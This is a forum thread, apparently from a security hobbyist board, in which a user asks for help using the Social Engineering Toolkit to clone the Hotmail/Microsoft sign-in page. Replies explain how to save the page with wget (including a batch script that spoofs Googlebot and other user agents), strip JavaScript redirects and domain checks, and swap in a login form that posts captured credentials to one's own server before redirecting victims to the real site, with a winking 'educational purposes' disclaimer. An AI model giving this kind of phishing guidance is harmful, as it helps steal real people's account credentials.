Jump to content

Social engineering toolkit hotmail cloning = blank page


Recommended Posts

Hello I have been a SET user for a long time, recently I have tried to use the website vector's site cloning hack and everything seems to work well until I try to use the cloning of the hotmail page, no matter what i try i get a blank page, it loads and shows up in SET but all I get is a blank, I have tried saving an offline page and the only way to get anything is to save as html NOT a complete web page and the sign in bars are tiny and not cloned correctly. Can anyone please give me some advice or help, I am stumped. Please and thanks

Link to comment
Share on other sites

Is hotmail still a site though? Is that the URL you enter in set? because I think they moved it to outlook.com and hotmail.com redirects me to live.com, so maybe its what you entered that is the issue? Try cloning another site. if still borked, then he has a bug in last release, or you need to edit config file to check if its commented out or enabled for cloning or whatever but I think the site cloner is on be default as one of the options and doesn;t require editing the config(at least I don't recall it needing any changes or uncommenting things to enable specific attacks for site cloning, only for which payloads).

Forgot, you can also use his contact form on the site: https://www.trustedsec.com/contact-us/ if you don't have Twitter, or hit up their irc channel and see if anyone can help, although, I hear some of the people can be less than helpful if its something in the documentation that was overlooked.

Edited by digip
Link to comment
Share on other sites

1.- Try the actual full url AFTER you wrote in your browser www.hotmail.com, the url to copy now would become...


2.- Notice that if you try facebook.com, the login is different from the actual login page with SET. for example when you write facebook.com in your browser you get the login at the top, but if you use SET you get the login on the middle. I think, I THINK... is because java scripts, cookies and all that stuff that SET won't be able to copy.

What that in mind, is not surprise that you can't copy hotmail directly.

Best Regards

Link to comment
Share on other sites

I have already tried to copy the direct link as you just stated above with no luck, I tried all the varible's before I post for help so I dont look stupid, thanks for the reply but i have tried the full url after going to the site and the same thing happens = Blank page

Link to comment
Share on other sites

updated and still no difference

One thing you can try, is creating the page manually though, saving locally, then inserting your payload code or java applet if thats the attack you are using. File > Save as > index.html and edit your script to serve that page or something. You can also use wget to spider pages, or HTTrack, but change the default User Agents when using wget and httrack, as many sites block them, like on my own site, I block specific ones and redirect them since they are tools known for hacking, like Sqlmap, httrack, libwww/perl, java, as a user agent, yeah, block it.
Link to comment
Share on other sites

what exactly is wget to spider pages, I googled it and to my understanding its a web crawler? And direction to point me in would be great, thanks.

I have tried to use the page offline and it looked good when saved as html only but when a complete page it looked didnt work, the html didnt log the information though

Link to comment
Share on other sites

You'd probably have to modify the saved page to add in code that Dave injects into cloned pages to gather the login details.

On the wget side, its a tool for many operating systems with versions for linux, windows and osx. Usually installed on most linux distros by default, but easy to install.

Simple command would be "wget http://www.somesite.com/index.html -O file.html" for example to save to file.html. Read the help file, shows how to add a user agent, accept cookies, SSl, etc.

Link to comment
Share on other sites

I understand wget just not spider pages, ill do some research since i am not sure on how to do any of that, I feel like a moron not knowing this stuff

Read the quote next to my name "-we're all just neophytes-". Nobody can know everything, and if you never heard of or used wget, you're not a moron. wget is an http download tool though, and can do a lot more than just download a page. It can spider(crawl) a whole site, download all images, files, etc, for offline viewing. I use it with windows for various things, combined with bat scripts and a little VBS, I use it to download RSS feeds of podcasts and videos, and all sorts of stuff. It can even be scripted as an attack tool depending on what you are doing, like brute forcing a login page, if you get that deep with it, but there are other tools that automate a lot of that already, so no need to re-invent the wheel.

wget is the go to tool though for a quick mirror of a site, just know that some sites block wget, so you can add command switches to add a fake user agent to look like google bot or such.

Example script I use when checking headers and following spam links (windows bat script, just never save the bat file as wget.bat or won't run..lol):

cd desktop
@echo off

echo                                     ÜÜÛÛÛÛ²²ÛÜÜ
echo                                ÜÜÛÛÛßßß ÜÜÜÛÛÛÛÛ²ÜÜ
echo                            ÜÜÛÛÛß ÜܲÛÛÛÛÛÛÛÛÛÛÛÛÛ²²ÜÜ
echo                        ÜÜÛ²ÛÛÛÛ Ü±ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ²²²Ü
echo                     ÜÛÛÛÛÛÛ±ÛÛÛ² ßÛÛÛÛÛÛ²²Û²ÛÛ²ÛÛÛ²²ÛÛÛ²Û²ÛÜ
echo         ÜÛ²ÜÛÜ     ÞÛÛÛÛÛ²±ÛÛÛÛÛÛ Þ±ÛÛ²²ÛÛÛÛ²²ÛÛ²²ÛÛÛÛ²²²Û²²Ý    ÜÛ²±ÜÜ
echo    ßß   ßÛÛ²          ÛÛÛÛÛÛÛÛÛÛ²ÜßÛÛÛÛÛÛÛÛÛÛÛß   ßÛÛÛ²ßÛ²         Û²ÛÛß  ßß
echo         ß²ÛÛÛÜ         ßÛ²²ÛÛß Ü ßÛ ÛÛÛÛÛÛÛÛÛ    Ü  ßÛÛ²ß        ÜÛ±Û²ß
echo           ß²ÛÛÛܲ      ÛÜÛÛÛ  ÜÝß ÞÛÜÛÛÛÛÛÛÛÛ²  Û Û ÞÛßܲ    ± Ü°±Û²ß
echo             ß²ÛÛÛÜ    Þ²ÛÛÛÛÜ  ß  ÛÛÛÛÛÛÛÛÛÛÛÛÛÜ ß ÜÛÜÛÛ²Ý  ±Ü°±Û²ß
echo                ßßÛÛÜ  ²ÛÛÛÛÛÛÛÜÜܲÛÛ²²ß ßÛÛÛÛÛÛ²²Üß±ÛÛÛÛÛ² ÜÛÛßß
echo         Û²²ß Ü ßÛÛÛÜ ß ßÛ²²ÛÛÛÛÛÜ²ß  Ü Þ    ßÛÛ ÛÛÛÛÛ²²Ûß  ÜÛÛ²Ûß± ß²²²Û
echo        ÛÛ Ü²ßßÛ  ÜÛÛÛ ÜÜ ßß²ÛÛßÜÜÝÜ ÞÝÝÞÝ  ÜÜßÜÛÜßÛÛ²ßß ÜÜÛÛ²²Ü  Üßß² ÛÛÛ
echo      ÜÛÛÛ²²²ßÛ±ÜÛß ÛÛÛ² ²ÜÛß ÜÛßÛ²ÛÛßÛßßÛÛÛßÛÛßÛßßÜ ßÛܲ ²ÛÛÛ ßÛܱÛß²²²ÛÛÛÜ
echo    ÜÛÛßßß   ÜÛ±ÛÛÛßÜÛÛßܲ²  ÞÛÝÛß ÛÝ ÛÛÝ Û ² ßÝÞ±ÝßÛ  ²²ÜßÛÛÜßÛÛÛ±ÛÜ   ßßßÛÛÜ
echo    ²Û  ßßÛÛÛÛßßÛÛÛ±²Ûß ±ÛÛÝ  ß  Ü  ßÜÜÜÜÜÜÜÜ  Ü ß ß  ÞÛÛÛ ßÛ²±ÛÛÛßßÛÛÛÛßß  Û²
echo    Û  ÛÛ      ÛÛÜÛÛ²  ßÛ²²Û²ÜÜÛÜÜ ÜÛÜÛÛ²²ÛÛÜÛÜ ÜÜÛÜܲ۲²Ûß  ²ÛÛÜÛÛ      ÛÛ  Û
echo       ßÛÛÜ   ÜÛÛÛÛß  Üß ßßÛÛÛÛß  ÜÛÛÛßß  ßßÛÛÛÜ  ßÛÛÛÛßß ßÜ  ßÛÛÛÛÜ   ÜÛÛß

::debug is optional, but helps to get as much returned info as possible.
ECHO [Wget Webpage (with Headers + Cookies) from what site?]
SET /P website="[example: www.google.com] : "

:: Page with LOTS of USer Agent examples - http://www.user-agents.org/
:: crawler@alexa.com to spoof as Alexa statistic bot
:: Opera/9.24 (Windows NT 5.1; U; en) if you want to spoof as Opera for Windows XP
:: GoogleBot Spoof because some sites require subscription access, but allow googlebot to index its pages.
:: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
:: QuickTime\xaa.7.0.4 (qtver=7.0.4;cpu=PPC;os=Mac 10.3.9)
:: IE6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
:: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3
:: Apache/2.2.3 (CentOS) (internal dummy connection)
::wget --save-headers --save-cookies %website%.cookie.txt %website% --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" -d -o debug.txt

:: iPhone user Agent Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3
wget -d -o debug.txt --save-headers --save-cookies "%website%".cookie.txt "%website%" --user-agent="IE6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" --no-check-certificate

::Google User Agent Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html).4322)
::wget %website% --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" -d -o debug.txt

SET /P yn="Continue or Quit? C/Q: "
if "%yn%" == "q" goto:end
if "%yn%" == "c" goto:top
if "%yn%" == "Q" goto:end
if "%yn%" == "C" goto:top

::In case they didn't pick from the above selections
echo Wrong Selection. Please choose C or Q

SET /P yn="Continue or Quit? C/Q: "
if "%yn%" == "q" goto:end
if "%yn%" == "c" goto:top
if "%yn%" == "Q" goto:end
if "%yn%" == "C" goto:top

Link to comment
Share on other sites

Thanks again for the reply, I will take a look at it and have a go. Ill do some research for wget and stripping pages, I am frustrated with myself for not knowing this stuff better. I appreciate the help from everyone.

Like digip said it takes time to learn all of these things. I used to set up a list of documents and vids to get through each day so that way I would continuously learn. Keeping up on twitter feeds for projects is a great idea too. Also try taking on a scripting project a little outside your comfort zone. This helps you learn to research and problem solve. Don't be discouraged, even the best minds had to start somewhere!

Link to comment
Share on other sites

This set issue is just kicking my but, i have failed at every attempt at trying to make this work lol, I looked up wget commands and ended up saving it as an offline page and got the same issue as saving it with the browser, nevertheless I have learned something new which is great. It seems like a javascript re-direct or something I dont know. Im for sure at a stand still at the moment. Thanks again for all the help and patience

Link to comment
Share on other sites

Microsoft does implement cross domain checking, but thats usually server side header checks. If Javascipt is in the page and checking your URL for the location, it might also redirect, so saving offline, means you need to open it in a text editor as well, and edit out things like that too or save the scripts offline if part of one is required to make a page load, and remove the check for https or if on the domain, loaded in iframes, etc. Its a learning process, but take it as a good thing since msft is increasing security to protect against attacks.

Link to comment
Share on other sites

not sure but anything JS file wise really, just replace the login form with your own function to post the data to your own web server to capture info, then redirect them to real site afterwards. Can probably strip most JS stuff unless its for displaying, and just insert your own html form to post to a php file to log stuff. Do it the old fashioned way, just have to be able to serve it to target machine without it redirecting before they enter anything. check head and footer area for script tags, poke around the code and see what its loading remotely. Things like:

<script src="http://site.com/file.js"></script>
type stuff, would need to inspect the files and see if any of them do cross domain checking or to see if loaded in iframes.

All for educational purposes of course, you know, testing out on local VM's and what not to see how to do it. ;)

Link to comment
Share on other sites

when I go to inspect the html i saved from hotmail it says this

Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.

To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...